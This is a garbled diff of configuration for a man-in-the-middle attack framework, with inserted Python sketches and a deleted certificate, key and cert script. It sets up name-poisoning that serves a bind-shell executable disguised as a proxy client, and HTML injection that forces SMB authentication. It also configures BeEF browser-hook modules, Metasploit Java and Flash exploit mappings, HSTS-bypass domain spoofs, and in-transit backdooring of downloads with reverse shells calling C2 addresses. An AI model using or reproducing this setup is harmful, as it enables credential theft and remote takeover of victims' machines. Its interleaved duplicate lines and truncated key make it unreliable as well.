#Set a custom challenge
#Custom challenge
Challenge = 1122334455667788
#Set this to change the default logging file
SessionLog = Responder-Session.log
#Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
#RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
#Specific IP Addresses to respond to (default = All)
#Example: RespondTo = 10.20.1.100-150, 10.20.3.10
RespondTo =
#Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
#RespondTo = WPAD,DEV,PROD,SQLINT
#Specific NBT-NS/LLMNR names to respond to (default = All)
#Example: RespondToName = WPAD, DEV, PROD, SQLINT
RespondToName =
#DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
#Specific IP Addresses not to respond to (default = None)
#Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
DontRespondTo =
#Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
#Specific NBT-NS/LLMNR names not to respond to (default = None)
#Example: DontRespondToName = NAC, IPS, IDS
DontRespondToName =
[[HTTP Server]]
#Set this to On if you want to always serve a specific file to the victim.
#Set to On to always serve the custom EXE
Serve-Always = Off
#Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
Serve-Exe = Off
#Set to On to replace any requested .exe with the custom EXE
Serve-Exe = On
#Uncomment and specify a custom file to serve, the file must exist.
Filename = config/responder/Denied.html
#Set to On to serve the custom HTML if the URL does not contain .exe
Serve-Html = Off
#Specify a custom executable file to serve, the file must exist.
ExecFilename = config/responder/FixInternet.exe
#Custom HTML to serve
HtmlFilename = config/responder/AccessDenied.html
#Set your custom PAC script
WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}'
#Custom EXE File to serve
ExeFilename = config/responder/BindShell.exe
#Name of the downloaded .exe that the client will see
ExeDownloadName = ProxyClient.exe
#Custom WPAD Script
WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}'
#HTML answer to inject in HTTP responses (before </body> tag).
#Set to an empty string to disable.
#In this example, we make users' browsers issue a request to our rogue SMB server.
HTMLToInject = <img src='file://RespProxySrv/pictures/logo.jpg' alt='Loading' height='1' width='1'>
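Taken together, the options above describe a simple decision tree for the rogue HTTP server; the sketch below is an assumption based on the comments (not Responder's actual source) of which payload, if any, gets served for a given request URL.

def choose_payload(url, serve_always, serve_exe, serve_html,
                   exe_filename, html_filename):
    if serve_always:
        return exe_filename              # always push the custom EXE
    if serve_exe and '.exe' in url.lower():
        return exe_filename              # replace any requested .exe
    if serve_html and '.exe' not in url.lower():
        return html_filename             # serve the custom HTML page
    return None                          # pass the request through untouched

# Example with the defaults above (Serve-Always Off, Serve-Exe On, Serve-Html Off)
print(choose_payload('/downloads/setup.exe', False, True, False,
                     'config/responder/BindShell.exe',
                     'config/responder/AccessDenied.html'))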
[[HTTPS Server]]
#Change to use your certs
cert = config/responder/certs/responder.crt
key = config/responder/certs/responder.key
[BeEFAutorun]
#Example config for the BeefAutorun plugin
mode = oneshot
#can be set to loop, or oneshot
#in loop mode the plugin will run modules on all hooked browsers every 10 seconds
#in oneshot mode the plugin will run modules only once per hooked browser
[[ALL]] #Runs specified modules on all hooked browsers
'Man-In-The-Browser'= '{}'
[[targets]] #Runs specified modules based on OS and Browser type
[[[Windows]]] #Target all Windows versions using Firefox and Internet Explorer
[[[[FF]]]]
'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'
[[[[IE]]]]
'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}'
[[[Windows 7]]] #Target only Windows 7 using Chrome
[[[[C]]]]
'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'
[[[Linux]]] #Target Linux platforms using Chrome
[[[[C]]]]
'Redirect Browser (Rickroll)' = '{}'
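The sketch below shows how a config like the one above could be dispatched with the BeefAPI client added in core/beefapi.py further down in this changeset; it is an illustration of the oneshot flow (loop mode would simply repeat it every 10 seconds), not the BeEFAutorun plugin itself, and the targets dict is a hypothetical mirror of the [[targets]] tree.

import json

def autorun_once(beef, targets):
    # beef is a logged-in BeefAPI instance; targets is a nested dict such as
    # {'Windows': {'FF': {'Fake Notification Bar (Firefox)': '{"url": "..."}'}}}
    for session in beef.hooked_browsers.online:
        for os_name, browsers in targets.items():
            if os_name.lower() not in session.os.lower():
                continue
            for module_name, options in browsers.get(session.name, {}).items():
                opts = json.loads(options) if isinstance(options, basestring) else options
                for module in beef.modules.findbyname(module_name):
                    module.run(session.session, opts)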
#Configure SSL Certificates to use
SSLCert = config/responder/responder.crt
SSLKey = config/responder/responder.key
[AppCachePoison]
# HTML5 AppCache poisoning attack
@ -204,18 +207,9 @@
templates=test # which templates to use for spoofing content?
skip_in_mass_poison=1
[[gmail]]
#use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
tamper_url=http://mail.google.com/mail/
# manifest has to be of last domain in redirect loop
manifest_url=http://mail.google.com/robots.txt
templates=default # could be omitted
[[google]]
tamper_url = http://www.google.com/
tamper_url_match = http://www.google.com\.*.
tamper_url = http://www.google.com
manifest_url = http://www.google.com/robots.txt
[[facebook]]
@ -225,7 +219,7 @@
[[twitter]]
tamper_url=http://twitter.com/
#tamper_url_match=^http://(www\.)?twitter\.com/$
tamper_url_match=^http://(www\.)?twitter\.com/$
manifest_url=http://twitter.com/robots.txt
[[html5rocks]]
@ -243,88 +237,167 @@
skip_in_mass_poison=1
#you can add other scripts in additional sections like jQuery etc.
[JavaPwn]
[BrowserSniper]
#
# Currently only supports java, flash and browser exploits
#
# The version strings were pulled from http://www.cvedetails.com
#
# When adding java exploits remember the following format: version string (e.g. 1.6.0) + update version (e.g. 28) = 1.6.0.28
#
#
# All version strings without a * are considered vulnerable if the client's Java version is <= the update version
# When adding more exploits remember the following format: version string (e.g. 1.6.0) + update version (e.g. 28) = 1.6.0.28
#
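For example, that normalisation is a one-liner; this is only an illustration of the version format (the browser's Java plugin reports versions such as 1.7.0_21), not BrowserSniper's actual matching code.

def normalize_java_version(reported):
    # '1.7.0_21' as reported by the plugin -> '1.7.0.21' as used in this config
    return reported.replace('_', '.')

def is_listed(reported, plugin_versions):
    # plugin_versions is a parsed PluginVersions list from an exploit entry
    return normalize_java_version(reported) in plugin_versions

print(is_listed('1.7.0_21', ['1.7.0', '1.7.0.17', '1.7.0.21']))  # True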
msfport = 8080 # Port to start Metasploit's webserver which will host the exploits
[[Multi]] #Cross platform exploits, yay java! <3
[[exploits]]
multi/browser/java_rhino = 1.6.0.28, 1.7.0.28
multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16
multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26
multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2
multi/browser/java_jre17_exec = 1.7.0.6
multi/browser/java_jre17_jaxws = 1.7.0.7
multi/browser/java_jre17_jmxbean = 1.7.0.10
multi/browser/java_jre17_jmxbean_2 = 1.7.0.11
multi/browser/java_jre17_reflection_types = 1.7.0.17
multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37
multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7
multi/browser/java_jre17_method_handle = 1.7.0.7
multi/browser/java_jre17_driver_manager = 1.7.0.17
multi/browser/java_jre17_provider_skeleton = 1.7.0.21
multi/browser/java_storeimagearray = 1.7.0.21
multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11
[[[multi/browser/java_rhino]]] #Exploit's MSF path
Type = PluginVuln #Can be set to PluginVuln, BrowserVuln
OS = Any #Can be set to Any, Windows or Windows + version (e.g Windows 8.1)
[[Windows]] #These are windows specific
Browser = Any #Can be set to Any, Chrome, Firefox, MSIE or browser + version (e.g IE 6)
Plugin = Java #Can be set to Java, Flash (if Type is BrowserVuln will be ignored)
windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7
windows/browser/java_cmm = 1.6.0.41, 1.7.0.15
windows/browser/java_mixer_sequencer = 1.6.0.18
#An exact list of the plugin versions affected (if Type is BrowserVuln will be ignored)
PluginVersions = 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.23, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.3, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0
[SSLstrip+]
#
#Here you can configure your domains to bypass HSTS on, the format is real.domain.com = fake.domain.com
#
[[[multi/browser/java_atomicreferencearray]]]
#for google and gmail
accounts.google.com = account.google.com
mail.google.com = gmail.google.com
accounts.google.se = cuentas.google.se
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.5.0, 1.5.0.1, 1.5.0.10, 1.5.0.11, 1.5.0.12, 1.5.0.13, 1.5.0.14, 1.5.0.15, 1.5.0.16, 1.5.0.17, 1.5.0.18, 1.5.0.19, 1.5.0.2, 1.5.0.20, 1.5.0.21, 1.5.0.22, 1.5.0.23, 1.5.0.24, 1.5.0.25, 1.5.0.26, 1.5.0.27, 1.5.0.28, 1.5.0.29, 1.5.0.3, 1.5.0.31, 1.5.0.33, 1.5.0.4, 1.5.0.5, 1.5.0.6, 1.5.0.7, 1.5.0.8, 1.5.0.9, 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.29, 1.6.0.3, 1.6.0.30, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0, 1.7.0.1, 1.7.0.2
#for facebook
www.facebook.com = social.facebook.com
[[[multi/browser/java_jre17_jmxbean_2]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
[[[multi/browser/java_jre17_reflection_types]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
[[[multi/browser/java_verifier_field_access]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.4.2.37, 1.5.0.35, 1.6.0.32, 1.7.0.4
[[[multi/browser/java_jre17_provider_skeleton]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.21, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
[[[exploit/windows/browser/adobe_flash_pcre]]]
Type = PluginVuln
OS = Windows
Browser = Any
Plugin = Flash
PluginVersions = 11.2.202.440, 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296
[[[exploit/windows/browser/adobe_flash_net_connection_confusion]]]
Type = PluginVuln
OS = Windows
Browser = Any
Plugin = Flash
PluginVersions = 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 16.0.0.305
[[[exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array]]]
Type = PluginVuln
OS = Windows
Browser = Any
Plugin = Flash
PluginVersions = 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273,11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.400, 13.0.0.111, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.83, 14.0.0.110, 14.0.0.125, 14.0.0.137, 14.0.0.145, 14.0.0.176, 14.0.0.178, 14.0.0.179, 15.0.0.144
[[[exploit/multi/browser/adobe_flash_opaque_background_uaf]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Flash
PluginVersions = 11.1, 11.1.102.59, 11.1.102.62, 11.1.102.63, 11.1.111.44, 11.1.111.50, 11.1.111.54, 11.1.111.64, 11.1.111.73, 11.1.111.8, 11.1.115.34, 11.1.115.48, 11.1.115.54, 11.1.115.58, 11.1.115.59, 11.1.115.63, 11.1.115.69, 11.1.115.7, 11.1.115.81, 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273, 11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.327, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.411, 11.2.202.424, 11.2.202.425, 11.2.202.429, 11.2.202.438, 11.2.202.440, 11.2.202.442, 11.2.202.451, 11.2.202.468, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.244, 13.0.0.250, 13.0.0.257, 13.0.0.258, 13.0.0.259, 13.0.0.260, 13.0.0.262, 13.0.0.264, 13.0.0.289, 13.0.0.292, 13.0.0.302, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 17.0.0.134, 17.0.0.169, 17.0.0.188, 17.0.0.190, 18.0.0.160, 18.0.0.194, 18.0.0.203, 18.0.0.204
[[[exploit/multi/browser/adobe_flash_hacking_team_uaf]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Flash
PluginVersions = 13.0.0.292, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 17.0.0.134, 17.0.0.169, 17.0.0.188, 18.0.0.161, 18.0.0.194
[FilePwn]
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
#
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
#
# Copyright (c) 2013-2014, Joshua Pitts
# All rights reserved.
#
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Copyright (c) 2013-2014, Joshua Pitts
# All rights reserved.
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Tested on Kali-Linux.
[[hosts]]
#whitelist host/IP - patch these only.
#ALL is everything, use the blacklist to leave certain hosts/IPs out
whitelist = ALL
#Hosts that are never patched, but still pass through the proxy. You can include host and ip, recommended to do both.
blacklist = , # a comma is null do not leave blank
[[keywords]]
#These checks look at the path of a url for keywords
whitelist = ALL
#For the blacklist, list binaries that you do not want to touch at all
# Also applied in zip files
blacklist = .dll
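As an illustration of how these two subsections interact (a sketch of the idea, not BDFProxy's actual code): a binary is only considered for patching when its host passes the [[hosts]] white/blacklist and its URL path contains none of the [[keywords]] blacklist entries.

def should_patch(host, url_path, host_whitelist, host_blacklist, keyword_blacklist):
    if host in host_blacklist:
        return False                               # never patch blacklisted hosts
    if host_whitelist != 'ALL' and host not in host_whitelist:
        return False                               # host not whitelisted
    for keyword in keyword_blacklist:
        if keyword and keyword in url_path.lower():
            return False                           # e.g. leave anything with '.dll' alone
    return True

print(should_patch('example.com', '/files/tool.exe', 'ALL', [], ['.dll']))    # True
print(should_patch('example.com', '/files/helper.dll', 'ALL', [], ['.dll']))  # False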
[[ZIP]]
# patchCount is the max number of files to patch in a zip file
@ -334,7 +407,7 @@
patchCount = 5
# In Bytes
maxSize = 40000000
maxSize = 50000000
blacklist = .dll, #don't do dlls in a zip file
@ -346,7 +419,7 @@
patchCount = 5
# In Bytes
maxSize = 40000000
maxSize = 10000000
blacklist = , # a comma is null do not leave blank
@ -360,10 +433,9 @@
WindowsType = ALL # choices: x86/x64/ALL/None
FatPriority = x64 # choices: x86 or x64
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
FileSizeMax = 10000000 # ~10 MB (just under) No patching of files this large
CompressedFiles = True #True/False
[[[[LinuxIntelx86]]]]
SHELL = reverse_shell_tcp # This is the BDF syntax
HOST = 192.168.1.168 # The C2
@ -379,28 +451,45 @@
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[[WindowsIntelx86]]]]
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE with jump
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke
PATCH_METHOD = automatic
HOST = 192.168.1.16
PORT = 8443
HOST = 192.168.20.79
PORT = 8090
# SHELL for use with automatic PATCH_METHOD
SHELL = iat_reverse_tcp_stager_threaded
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
SUPPLIED_SHELLCODE = None
ZERO_CERT = False
PATCH_DLL = True
ZERO_CERT = True
# PATCH_DLLs as they come across
PATCH_DLL = False
# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
RUNAS_ADMIN = False
# XP_MODE - to support XP targets
XP_MODE = True
# SUPPLIED_BINARY is for use with PATCH_METHOD 'onionduke'; the DLL/EXE can be x64, and
# with PATCH_METHOD 'replace' use an EXE not DLL
SUPPLIED_BINARY = veil_go_payload.exe
MSFPAYLOAD = windows/meterpreter/reverse_tcp
[[[[WindowsIntelx64]]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE with jump
# PATCH_METHOD overwrites PATCH_TYPE, use automatic or onionduke
PATCH_METHOD = automatic
HOST = 192.168.1.16
PORT = 8088
# SHELL for use with automatic PATCH_METHOD
SHELL = iat_reverse_tcp_stager_threaded
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
SUPPLIED_SHELLCODE = None
ZERO_CERT = True
PATCH_DLL = False
MSFPAYLOAD = windows/x64/shell_reverse_tcp
PATCH_DLL = True
# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
RUNAS_ADMIN = False
# SUPPLIED_BINARY is for use with PATCH_METHOD onionduke; the DLL/EXE can be x86 32-bit, and
# with PATCH_METHOD 'replace' use an EXE not DLL
SUPPLIED_BINARY = pentest_x64_payload.exe
MSFPAYLOAD = windows/x64/shell/reverse_tcp
[[[[MachoIntelx86]]]]
SHELL = reverse_shell_tcp
@ -414,4 +503,26 @@
HOST = 192.168.1.16
PORT = 5555
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
MSFPAYLOAD = linux/x64/shell_reverse_tcp
# Call out the difference for targets here as they differ from ALL
# These settings override the ALL settings
[[[sysinternals.com]]]
LinuxType = None
WindowsType = ALL
CompressedFiles = False
#inherits WindowsIntelx86 from ALL
[[[[WindowsIntelx86]]]]
PATCH_DLL = False
ZERO_CERT = True
[[[sourceforge.org]]]
WindowsType = x64
CompressedFiles = False
[[[[WindowsIntelx64]]]]
PATCH_DLL = False
[[[[WindowsIntelx86]]]]
PATCH_DLL = False

@ -1,2 +0,0 @@
#!/bin/bash
openssl genrsa -des3 -out responder.tmp.key 2048&&openssl rsa -in responder.tmp.key -out responder.key&&openssl req -new -key responder.key -out responder.csr&&openssl x509 -req -days 365 -in responder.csr -signkey responder.key -out responder.crt&&rm responder.tmp.key responder.csr

@ -1,19 +0,0 @@
-----BEGIN CERTIFICATE-----
MIIDBjCCAe4CCQDDe8Sb2PGjITANBgkqhkiG9w0BAQUFADBFMQswCQYDVQQGEwJB
VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
cyBQdHkgTHRkMB4XDTEzMDIyODIwMTcxN1oXDTE0MDIyODIwMTcxN1owRTELMAkG
A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
AMQB5yErm0Sg7sRQbLgbi/hG/8uF2xUzvVKnT4LROEWkkimy9umb2JbvAZITDvSs
r2xsPA4VoxFjKpWLOv7mAIMBR95NDWsTLuR36Sho/U2LlTlUBdSfQP7rlKQZ0L43
YpXswdvCCJ0wP2yOhq0i71cg/Nk9mfQxftpgGUxoa+6ljU9hSdmThu2FVgAbSpNl
D86rk4K9/sGYAY4btMqaMzC7JIKZp07FHL32oM01cKbRoNg2eUuQmoVjca1pkmbO
Y8qnl7ajOjsiAPQnt/2TMJlRsdoU1fSx76Grgkm8D4gX/pBUqELdpvHtnm/9imPl
qNGL5LaW8ARgG16U0mRhutkCAwEAATANBgkqhkiG9w0BAQUFAAOCAQEAS7u4LWc9
wDPThD0o58Ti2GgIs+mMRx5hPaxWHJNCu+lwFqjvWmsNFfHoSzlIkIUjtlV2G/wE
FxDSPlc/V+r7U2UiE7WSqQiWdmfOYS2m03x4SN0Vzf/n9DeApyPo2GsXGrha20eN
s390Xwj6yKFdprUPJ8ezlEVRrAMv7tu1cOLzqmkocYKnPgXDdQxiiGisp7/hEUCQ
B7HvNCMPbOi+M7O/CXbfgnTD029KkyiR2LEtj4QC5Ytp/pj0UyyoIeCK57CTB3Jt
X3CZ+DiphTpOca4iENH55m6atk+WHYwg3ClYiONQDdIgKVT3BK0ITjyFWZeTneVu
1eVgF/UkX9fqJg==
-----END CERTIFICATE-----

@ -1,27 +0,0 @@
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxAHnISubRKDuxFBsuBuL+Eb/y4XbFTO9UqdPgtE4RaSSKbL2
6ZvYlu8BkhMO9KyvbGw8DhWjEWMqlYs6/uYAgwFH3k0NaxMu5HfpKGj9TYuVOVQF
1J9A/uuUpBnQvjdilezB28IInTA/bI6GrSLvVyD82T2Z9DF+2mAZTGhr7qWNT2FJ
2ZOG7YVWABtKk2UPzquTgr3+wZgBjhu0ypozMLskgpmnTsUcvfagzTVwptGg2DZ5
S5CahWNxrWmSZs5jyqeXtqM6OyIA9Ce3/ZMwmVGx2hTV9LHvoauCSbwPiBf+kFSo
Qt2m8e2eb/2KY+Wo0YvktpbwBGAbXpTSZGG62QIDAQABAoIBABbuLg74XgLKXQSE
cCOdvWM/Ux+JOlchpW1s+2VPeqjTFvJf6Hjt7YnCzkk7h41iQmeJxgDT0S7wjgPO
tQkq+TZaSQEdvIshRGQgDxvWJIQU51E8ni4Ar4bjIpGMH5qROixV9VvzODTDdzgI
+IJ6ystDpbD4fvFNdQyxH2SL9syFRyWyxY3vWB0C/OHWxGFtiTtmeivBSmpxl0RY
RQqPLxX+xUCie7U6ud3e37FO7cKt+YT8lWKhGHKJlTlJbHs1d8crzp6qKJLl+ibB
0fB6D6E5M1fnIJFJULIYAG5bEak90KuKOKCLoKLG+rq0vUvJsb9vNCAA6rh1ra+n
8woY8TECgYEA7CEE/3oWnziB3PZoIIJDgbBalCCbA+/SgDiSvYJELEApCMj8HYc5
UGOxrfVhPmbHRUI982Fj1oM3QBEX0zpkOk7Xk224RXwBHG8MMPQmTMVp+o06AI6D
Nggyam9v5KLNMj5KghKJSOD0tR5YxsZPXw4gAI+wpqu3bXGKZ8bRpvUCgYEA1ICJ
H+kw6H8edJHGdNH+X6RR0DIbS11XQvbKQ3vh6LdHTofoHqQa3t0zGYCgksKJbtHV
2h3pv+nuOu5FEP2rrGJIforv2zwfJ5vp65jePrSXU+Up4pMHbP1Rm91ApcKNA15U
q3SaclqTjmiqvaeSKc4TDjdb/rUaIhyIgbg97dUCgYAcdq5/jVwEvW8KD7nlkU5J
59RDXtrQ0qvxQOCPb5CANQu9P10EwjQqeJoGejnKp+EFfEKzf93lEdQrKORSVguW
68IYx3UbCyOnJcu2avfi8TkhNrzzLDqs3LgXFG/Mg8NwdwnMPCfIXTWiT5IsA+O1
daJt7uRAcxqdWr5wXAsRsQKBgFXU4Q4hm16dUcjVxKoU08D/1wfX5UxolEF4+zOM
yy+7L7MZk/kkYbIY+HXZjYIZz3cSjGVAZdTdgRsOeJknTPsg65UpOz57Jz5RbId7
xHDhcqoxSty4dGxiWV8yW9VYIqr0pBBo1aVQzn7b6fMWxyPZl7rLQ3462iZjDgQP
TfxNAoGBAK/Gef6MgchbFPikOVEX9qB/wt4sS3V7mT6QkqMZZgSkegDLBFVRJX3w
Emx/V2A14p0uHPzn5irURyJ6daZCN4amPAWYQnkiXG8saiBwtfs23A1q7kxnPR+b
